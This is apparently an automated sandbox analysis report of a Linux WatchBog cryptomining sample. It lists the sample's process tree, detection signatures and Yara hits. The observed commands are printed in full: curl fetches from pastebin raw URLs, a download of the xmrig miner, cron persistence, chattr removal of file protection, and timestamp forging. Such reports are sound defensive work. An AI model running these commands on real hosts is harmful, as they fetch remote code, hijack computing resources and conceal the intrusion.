Source: /bin/ps (PID: 19522)File opened: /proc/12/stat
Source: /bin/ps (PID: 19522)File opened: /proc/12/status
Source: /bin/ps (PID: 19522)File opened: /proc/12/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/13/stat
Source: /bin/ps (PID: 19522)File opened: /proc/13/status
Source: /bin/ps (PID: 19522)File opened: /proc/13/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/14/stat
Source: /bin/ps (PID: 19522)File opened: /proc/14/status
Source: /bin/ps (PID: 19522)File opened: /proc/14/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/9475/stat
Source: /bin/ps (PID: 19522)File opened: /proc/9475/status
Source: /bin/ps (PID: 19522)File opened: /proc/9475/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/15/stat
Source: /bin/ps (PID: 19522)File opened: /proc/15/status
Source: /bin/ps (PID: 19522)File opened: /proc/15/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/16/stat
Source: /bin/ps (PID: 19522)File opened: /proc/16/status
Source: /bin/ps (PID: 19522)File opened: /proc/16/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/17/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17/status
Source: /bin/ps (PID: 19522)File opened: /proc/17/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/18023/stat
Source: /bin/ps (PID: 19522)File opened: /proc/18023/status
Source: /bin/ps (PID: 19522)File opened: /proc/18023/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/18/stat
Source: /bin/ps (PID: 19522)File opened: /proc/18/status
Source: /bin/ps (PID: 19522)File opened: /proc/18/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/19/stat
Source: /bin/ps (PID: 19522)File opened: /proc/19/status
Source: /bin/ps (PID: 19522)File opened: /proc/19/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/1194/stat
Source: /bin/ps (PID: 19522)File opened: /proc/1194/status
Source: /bin/ps (PID: 19522)File opened: /proc/1194/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/1/stat
Source: /bin/ps (PID: 19522)File opened: /proc/1/status
Source: /bin/ps (PID: 19522)File opened: /proc/1/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/2/stat
Source: /bin/ps (PID: 19522)File opened: /proc/2/status
Source: /bin/ps (PID: 19522)File opened: /proc/2/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/2315/stat
Source: /bin/ps (PID: 19522)File opened: /proc/2315/status
Source: /bin/ps (PID: 19522)File opened: /proc/2315/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/3/stat
Source: /bin/ps (PID: 19522)File opened: /proc/3/status
Source: /bin/ps (PID: 19522)File opened: /proc/3/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/401/stat
Source: /bin/ps (PID: 19522)File opened: /proc/401/status
Source: /bin/ps (PID: 19522)File opened: /proc/401/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/247/stat
Source: /bin/ps (PID: 19522)File opened: /proc/247/status
Source: /bin/ps (PID: 19522)File opened: /proc/247/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/5/stat
Source: /bin/ps (PID: 19522)File opened: /proc/5/status
Source: /bin/ps (PID: 19522)File opened: /proc/5/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/7/stat
Source: /bin/ps (PID: 19522)File opened: /proc/7/status
Source: /bin/ps (PID: 19522)File opened: /proc/7/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/8/stat
Source: /bin/ps (PID: 19522)File opened: /proc/8/status
Source: /bin/ps (PID: 19522)File opened: /proc/8/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/17978/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17978/status
Source: /bin/ps (PID: 19522)File opened: /proc/17978/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/9/stat
Source: /bin/ps (PID: 19522)File opened: /proc/9/status
Source: /bin/ps (PID: 19522)File opened: /proc/9/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/19518/stat
Source: /bin/ps (PID: 19522)File opened: /proc/19518/status
Source: /bin/ps (PID: 19522)File opened: /proc/19518/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/17732/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17732/status
Source: /bin/ps (PID: 19522)File opened: /proc/17732/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/17853/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17853/status
Source: /bin/ps (PID: 19522)File opened: /proc/17853/cmdline
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 19324)Chmod executable: /bin/chmod -> chmod 755 /bin/httpntp
Source: /bin/bash (PID: 19362)Chmod executable: /bin/chmod -> chmod 755 /bin/ftpsdns
Source: /bin/bash (PID: 19491)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19492)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19493)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.monthly/oanacroane
Source: /bin/bash (PID: 19749)Chmod executable: /bin/chmod -> chmod 777 /bin/watchbog
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /bin/bash (PID: 19335)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/4HvzGfGm
Source: /bin/bash (PID: 19462)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/EzqVke6X
Source: /bin/bash (PID: 19642)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/dXD2Bs0H
Source: /bin/bash (PID: 19691)Curl executable: /usr/bin/curl -> curl -fsSL https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz -o /tmp/.tmpdropoff/rig.tar.gz
Source: /bin/bash (PID: 19839)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/LUN80Hj8
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/bash (PID: 19264)Grep executable: /bin/grep -> grep watchbog
Source: /bin/bash (PID: 19265)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 19523)Grep executable: /bin/grep -> grep watchbog
Source: /bin/bash (PID: 19524)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 19803)Grep executable: /bin/grep -> grep watchbog
Source: /bin/bash (PID: 19804)Grep executable: /bin/grep -> grep -v grep
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/bash (PID: 19366)Mkdir executable: /bin/mkdir -> mkdir -p /var/spool/cron/crontabs
Source: /bin/bash (PID: 19367)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.hourly
Source: /bin/bash (PID: 19368)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.daily
Source: /bin/bash (PID: 19370)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.monthly
Source: /bin/bash (PID: 19689)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/.tmpdropoff//dataoutput/
Executes the "nohup" (no hangup) command used to avoid background terminal process from being killedShow sources
Source: /bin/bash (PID: 19753)Nohup executable: /usr/bin/nohup -> nohup ./watchbog
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/bash (PID: 19263)Ps executable: /bin/ps -> ps -fe
Source: /bin/bash (PID: 19522)Ps executable: /bin/ps -> ps -fe
Source: /bin/bash (PID: 19802)Ps executable: /bin/ps -> ps -fe
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/bash (PID: 19307)Rm executable: /bin/rm -> rm -rf /bin/httpntp /bin/ftpsdns
Source: /bin/bash (PID: 19365)Rm executable: /bin/rm -> rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
Source: /bin/bash (PID: 19636)Rm executable: /bin/rm -> rm -rf /bin/config.json /bin/watchbog
Source: /bin/bash (PID: 19744)Rm executable: /bin/rm -> rm -rf /tmp/.tmpdropoff/
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/bash (PID: 19363)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/crontab
Source: /bin/bash (PID: 19494)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/root
Source: /bin/bash (PID: 19495)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 19496)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/system
Source: /bin/bash (PID: 19497)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/apache
Source: /bin/bash (PID: 19498)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/root
Source: /bin/bash (PID: 19500)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19503)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19507)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.monthly/oanacroane
Source: /bin/bash (PID: 19849)Touch executable: /bin/touch -> touch /tmp/.tmpc
Reads system information from the proc file systemShow sources
Source: /bin/ps (PID: 19263)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 19263)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 19522)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 19522)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 19802)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 19802)Reads from proc file: /proc/stat
Sample tries to set the executable flagShow sources
Source: /bin/chmod (PID: 19324)File: /bin/httpntp (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19362)File: /bin/ftpsdns (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19491)File: /etc/cron.hourly/oanacroane (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19492)File: /etc/cron.daily/oanacroane (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19493)File: /etc/cron.monthly/oanacroane (bits: - usr: rx grp: rx all: rwx)
Source: /bin/tar (PID: 19712)File: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls (bits: - usr: rx grp: rx all: rwx)
Source: /bin/tar (PID: 19712)File: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig (bits: - usr: rx grp: rx all: rwx)
Source: /bin/tar (PID: 19712)File: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1 (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19749)File: /bin/watchbog (bits: - usr: rwx grp: rwx all: rwx)
Writes ELF files to diskShow sources
Source: /bin/tar (PID: 19712)File written: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notlsJump to dropped file
Source: /bin/tar (PID: 19712)File written: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrigJump to dropped file
Writes crontab like entries to files to /var or /etc typically for achieving persistenceShow sources
Source: /bin/bash (PID: 19147)Crontab like entry written: /etc/crontabJump to dropped file
Source: /bin/sed (PID: 19308)Crontab like entry written: /etc/seddlpHGCJump to dropped file
Source: /bin/sed (PID: 19310)Crontab like entry written: /etc/sedTLJ6tFJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directoriesShow sources
Source: /bin/bash (PID: 19147)File: /bin/httpntpJump to dropped file
Source: /usr/bin/curl (PID: 19335)File: /bin/ftpsdnsJump to dropped file
Source: /usr/bin/base64 (PID: 19638)File: /bin/config.json
Source: ./watchbog (PID: 19753)File: /bin/config.jsonJump to dropped file
Drops files with innocent-looking namesShow sources
Source: /bin/bash (PID: 19147)Path: /etc/cron.d/apacheJump to dropped file
Executes the "base64" command used to encode or decode data (e.g. files, payloads)Show sources
Source: /bin/bash (PID: 19158)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19166)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19174)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19189)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19200)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19211)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19629)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19632)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19635)Base64 executable: /usr/bin/base64 -> base64 -d
Source: /bin/bash (PID: 19638)Base64 executable: /usr/bin/base64 -> base64 -d

Malware Analysis System Evasion:

barindex
Executes the "sleep" command used to delay execution and potentially evade sandboxesShow sources
Source: /bin/bash (PID: 19754)Sleep executable: /bin/sleep -> sleep 15
Source: /bin/bash (PID: 19850)Sleep executable: /bin/sleep -> sleep 30
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: ./watchbog (PID: 19753)Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)Show sources
Source: /bin/bash (PID: 19147)Queries kernel information via 'uname':
Source: /bin/uname (PID: 19235)Queries kernel information via 'uname':
Source: /bin/uname (PID: 19245)Queries kernel information via 'uname':
Source: /bin/ps (PID: 19263)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19335)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19462)Queries kernel information via 'uname':
Source: /bin/ps (PID: 19522)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19642)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19691)Queries kernel information via 'uname':
Source: ./watchbog (PID: 19753)Queries kernel information via 'uname':
Source: /bin/ps (PID: 19802)Queries kernel information via 'uname':
Source: /usr/bin/curl (PID: 19839)Queries kernel information via 'uname':

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Removes protection from filesShow sources
Source: /bin/bash (PID: 19306)Args: chattr -i /etc/crontab
Source: /bin/bash (PID: 19364)Args: chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root


Runtime Messages

Command:bash "/tmp/AEjyioBcTB"
Exit Code:
Exit Code Info:
Killed:True
Standard Output:I am root
Setting Up Sys Cron
xmrig-2.14.1/
xmrig-2.14.1/config.json
xmrig-2.14.1/xmrig-notls
xmrig-2.14.1/xmrig
Standard Error:chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
sed: can't read /etc/cron.d/root: No such file or directory
sed: can't read /etc/cron.d/apache: No such file or directory
sed: can't read /etc/cron.d/system: No such file or directory
sed: can't read /var/spool/cron/crontabs/root: No such file or directory
sed: can't read /var/spool/cron/root: No such file or directory

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 922045 Sample: AEjyioBcTB Startdate: 25/07/2019 Architecture: LINUX Score: 96 61 pastebin.com 2->61 63 37.59.54.205, 60262, 80 unknown France 2->63 65 5 other IPs or domains 2->65 75 Malicious sample detected (through community Yara rule) 2->75 77 Yara detected Linux WatchBog 2->77 79 Detected Stratum mining protocol 2->79 83 4 other signatures 2->83 9 bash 2->9         started        signatures3 81 Connects to a pastebin service (likely for C&C) 61->81 process4 file5 47 /var/spool/cron/root, ASCII 9->47 dropped 49 /var/spool/cron/crontabs/root, ASCII 9->49 dropped 51 /etc/crontab, ASCII 9->51 dropped 53 7 other malicious files 9->53 dropped 87 Drops files in suspicious directories 9->87 89 Sample tries to persist itself using cron 9->89 13 bash 9->13         started        15 bash nohup watchbog 9->15         started        19 bash tar 9->19         started        21 56 other processes 9->21 signatures6 process7 file8 23 bash curl 13->23         started        55 /bin/config.json, ASCII 15->55 dropped 67 Drops files in suspicious directories 15->67 57 /tmp/.tmpdropoff/d...-2.14.1/xmrig-notls, ELF 19->57 dropped 59 /tmp/.tmpdropoff/d.../xmrig-2.14.1/xmrig, ELF 19->59 dropped 27 tar gzip 19->27         started        69 Sets full permissions to files and/or directories 21->69 71 Sample tries to persist itself using cron 21->71 73 Explicitly modifies time stamps using the "touch" command 21->73 29 bash 21->29         started        31 bash 21->31         started        33 bash 21->33         started        35 34 other processes 21->35 signatures9 process10 file11 45 /bin/ftpsdns, ASCII 23->45 dropped 85 Drops files in suspicious directories 23->85 37 bash uname 29->37         started        39 bash uname 31->39         started        41 bash getconf 33->41         started        43 bash curl 35->43         started        signatures12 process13

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
AEjyioBcTBJoeSecurity_WatchBog_CythonYara detected Linux WatchBogunknown
  • 0x3bce:$c0: /tmp/.tmplassstgggzzzqpppppp12233333
  • 0x3c03:$c0: /tmp/.tmplassstgggzzzqpppppp12233333
  • 0x25fa:$c1: watchbog
  • 0x2866:$c1: watchbog
  • 0x2913:$c1: watchbog
  • 0x2954:$c1: watchbog
  • 0x2972:$c1: watchbog
  • 0x2987:$c1: watchbog
  • 0x29b6:$c1: watchbog
  • 0x2a0e:$c1: watchbog
  • 0x2a43:$c1: watchbog
  • 0x2a61:$c1: watchbog
  • 0x2a76:$c1: watchbog
  • 0x2aa5:$c1: watchbog
  • 0x2ae1:$c1: watchbog
  • 0x2b22:$c1: watchbog
  • 0x2b40:$c1: watchbog
  • 0x2b55:$c1: watchbog
  • 0x2b84:$c1: watchbog
  • 0x2be0:$c1: watchbog
  • 0x2e8b:$c1: watchbog

PCAP (Network Traffic)

No yara matches

Dropped Files

SourceRuleDescriptionAuthorStrings
/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notlsXMRIG_Monero_MinerDetects Monero mining softwareFlorian Roth
  • 0x22c8b2:$s2: --cpu-affinity set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
  • 0x22c5ca:$s3: -p, --pass=PASSWORD password for mining server

Antivirus and Machine Learning Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

  • system is lnxubuntu1
  • bash (PID: 19147, Parent: 19098, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: /bin/bash /tmp/AEjyioBcTB
    • bash New Fork (PID: 19155, Parent: 19147)
      • bash New Fork (PID: 19157, Parent: 19155)
      • bash New Fork (PID: 19158, Parent: 19155)
      • base64 (PID: 19158, Parent: 19155, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19163, Parent: 19147)
      • bash New Fork (PID: 19165, Parent: 19163)
      • bash New Fork (PID: 19166, Parent: 19163)
      • base64 (PID: 19166, Parent: 19163, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19170, Parent: 19147)
      • bash New Fork (PID: 19173, Parent: 19170)
      • bash New Fork (PID: 19174, Parent: 19170)
      • base64 (PID: 19174, Parent: 19170, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19183, Parent: 19147)
      • bash New Fork (PID: 19188, Parent: 19183)
      • bash New Fork (PID: 19189, Parent: 19183)
      • base64 (PID: 19189, Parent: 19183, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19196, Parent: 19147)
      • bash New Fork (PID: 19199, Parent: 19196)
      • bash New Fork (PID: 19200, Parent: 19196)
      • base64 (PID: 19200, Parent: 19196, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19208, Parent: 19147)
      • bash New Fork (PID: 19210, Parent: 19208)
      • bash New Fork (PID: 19211, Parent: 19208)
      • base64 (PID: 19211, Parent: 19208, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19216, Parent: 19147)
    • whoami (PID: 19216, Parent: 19147, MD5: a88b7850f1cdbf532f14069816273b63) Arguments: whoami
    • bash New Fork (PID: 19226, Parent: 19147)
      • bash New Fork (PID: 19231, Parent: 19226)
        • bash New Fork (PID: 19235, Parent: 19231)
        • uname (PID: 19235, Parent: 19231, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -m
      • bash New Fork (PID: 19241, Parent: 19226)
        • bash New Fork (PID: 19245, Parent: 19241)
        • uname (PID: 19245, Parent: 19241, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -i
      • bash New Fork (PID: 19249, Parent: 19226)
        • bash New Fork (PID: 19251, Parent: 19249)
        • getconf (PID: 19251, Parent: 19249, MD5: fb82f5a117dcfb922b370bf3a50c5c0a) Arguments: getconf LONG_BIT
    • bash New Fork (PID: 19259, Parent: 19147)
      • bash New Fork (PID: 19263, Parent: 19259)
      • ps (PID: 19263, Parent: 19259, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
      • bash New Fork (PID: 19264, Parent: 19259)
      • grep (PID: 19264, Parent: 19259, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep watchbog
      • bash New Fork (PID: 19265, Parent: 19259)
      • grep (PID: 19265, Parent: 19259, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
      • bash New Fork (PID: 19266, Parent: 19259)
      • wc (PID: 19266, Parent: 19259, MD5: 0d6e0835ddbd0b179ae07b6317c676d4) Arguments: wc -l
    • bash New Fork (PID: 19306, Parent: 19147)
    • chattr (PID: 19306, Parent: 19147, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /etc/crontab
    • bash New Fork (PID: 19307, Parent: 19147)
    • rm (PID: 19307, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /bin/httpntp /bin/ftpsdns
    • bash New Fork (PID: 19308, Parent: 19147)
    • sed (PID: 19308, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /httpntp/d /etc/crontab
    • bash New Fork (PID: 19310, Parent: 19147)
    • sed (PID: 19310, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /ftpsdns/d /etc/crontab
    • bash New Fork (PID: 19324, Parent: 19147)
    • chmod (PID: 19324, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /bin/httpntp
    • bash New Fork (PID: 19330, Parent: 19147)
      • bash New Fork (PID: 19335, Parent: 19330)
      • curl (PID: 19335, Parent: 19330, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/4HvzGfGm
    • bash New Fork (PID: 19362, Parent: 19147)
    • chmod (PID: 19362, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /bin/ftpsdns
    • bash New Fork (PID: 19363, Parent: 19147)
    • touch (PID: 19363, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/crontab
    • bash New Fork (PID: 19364, Parent: 19147)
    • chattr (PID: 19364, Parent: 19147, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
    • bash New Fork (PID: 19365, Parent: 19147)
    • rm (PID: 19365, Parent: 19147, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
    • bash New Fork (PID: 19366, Parent: 19147)
    • mkdir (PID: 19366, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /var/spool/cron/crontabs
    • bash New Fork (PID: 19367, Parent: 19147)
    • mkdir (PID: 19367, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /etc/cron.hourly
    • bash New Fork (PID: 19368, Parent: 19147)
    • mkdir (PID: 19368, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /etc/cron.daily
    • bash New Fork (PID: 19370, Parent: 19147)
    • mkdir (PID: 19370, Parent: 19147, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /etc/cron.monthly
    • bash New Fork (PID: 19373, Parent: 19147)
    • sed (PID: 19373, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /etc/cron.d/root
    • bash New Fork (PID: 19387, Parent: 19147)
    • sed (PID: 19387, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /etc/cron.d/apache
    • bash New Fork (PID: 19404, Parent: 19147)
    • sed (PID: 19404, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /etc/cron.d/system
    • bash New Fork (PID: 19421, Parent: 19147)
    • sed (PID: 19421, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /var/spool/cron/crontabs/root
    • bash New Fork (PID: 19438, Parent: 19147)
    • sed (PID: 19438, Parent: 19147, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -i /pastebin.com/d /var/spool/cron/root
    • bash New Fork (PID: 19452, Parent: 19147)
      • bash New Fork (PID: 19459, Parent: 19452)
        • bash New Fork (PID: 19462, Parent: 19459)
        • curl (PID: 19462, Parent: 19459, MD5: 53ea41160209f7801a5d5f07b546a9cd) Arguments: curl -fsSL https://pastebin.com/raw/EzqVke6X
    • bash New Fork (PID: 19491, Parent: 19147)
    • chmod (PID: 19491, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /etc/cron.hourly/oanacroane
    • bash New Fork (PID: 19492, Parent: 19147)
    • chmod (PID: 19492, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /etc/cron.daily/oanacroane
    • bash New Fork (PID: 19493, Parent: 19147)
    • chmod (PID: 19493, Parent: 19147, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 755 /etc/cron.monthly/oanacroane
    • bash New Fork (PID: 19494, Parent: 19147)
    • touch (PID: 19494, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /var/spool/cron/root
    • bash New Fork (PID: 19495, Parent: 19147)
    • touch (PID: 19495, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /var/spool/cron/crontabs/root
    • bash New Fork (PID: 19496, Parent: 19147)
    • touch (PID: 19496, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.d/system
    • bash New Fork (PID: 19497, Parent: 19147)
    • touch (PID: 19497, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.d/apache
    • bash New Fork (PID: 19498, Parent: 19147)
    • touch (PID: 19498, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.d/root
    • bash New Fork (PID: 19500, Parent: 19147)
    • touch (PID: 19500, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.hourly/oanacroane
    • bash New Fork (PID: 19503, Parent: 19147)
    • touch (PID: 19503, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.daily/oanacroane
    • bash New Fork (PID: 19507, Parent: 19147)
    • touch (PID: 19507, Parent: 19147, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/sh /etc/cron.monthly/oanacroane
    • bash New Fork (PID: 19518, Parent: 19147)
      • bash New Fork (PID: 19522, Parent: 19518)
      • ps (PID: 19522, Parent: 19518, MD5: 37339e5441057d422e61e8a471505337) Arguments: ps -fe
      • bash New Fork (PID: 19523, Parent: 19518)
      • grep (PID: 19523, Parent: 19518, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep watchbog
      • bash New Fork (PID: 19524, Parent: 19518)
      • grep (PID: 19524, Parent: 19518, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v grep
      • bash New Fork (PID: 19525, Parent: 19518)
      • wc (PID: 19525, Parent: 19518, MD5: 0d6e0835ddbd0b179ae07b6317c676d4) Arguments: wc -l
    • bash New Fork (PID: 19627, Parent: 19147)
      • bash New Fork (PID: 19628, Parent: 19627)
      • bash New Fork (PID: 19629, Parent: 19627)
      • base64 (PID: 19629, Parent: 19627, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19630, Parent: 19147)
      • bash New Fork (PID: 19631, Parent: 19630)
      • bash New Fork (PID: 19632, Parent: 19630)
      • base64 (PID: 19632, Parent: 19630, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19633, Parent: 19147)
      • bash New Fork (PID: 19634, Parent: 19633)
      • bash New Fork (PID: 19635, Parent: 19633)
      • base64 (PID: 19635, Parent: 19633, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    • bash New Fork (PID: 19636, Parent: 19147)
